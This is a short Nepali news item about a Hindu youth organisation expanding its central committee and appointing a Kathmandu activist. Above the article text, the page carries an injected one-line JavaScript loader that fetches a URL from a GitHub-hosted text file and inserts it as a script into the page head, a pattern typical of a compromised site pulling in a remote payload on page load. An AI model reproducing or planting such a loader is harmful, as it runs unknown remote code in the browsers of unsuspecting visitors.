;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
२१, असोज, काठमाडौँ |
बिश्वो हिन्दु युवा संघले मिति २०७७ साल अशोज २० गते १०६ जनाको केन्द्रीय कार्यसमिति बिस्तार गरेको छ | संघका केन्द्रीय अध्यक्ष रहेका ऋषिकेश जंग शाहको नेतृत्वमा सो कार्यसमिति बिस्तार गर्ने क्रममा काठमाडौँबाट युवा धार्मिक अभियान्ता राजु सुनार केन्द्रीय समितिमा मनोनयन भएका छन् |
बिश्वो हिन्दु युवा संघ, बिश्वो हिन्धु महासंघ नेपालको अधिनमा रहेर कार्य गर्ने एक धार्मिक संस्था हो |
फेसबुक प्रतिक्रियाहरु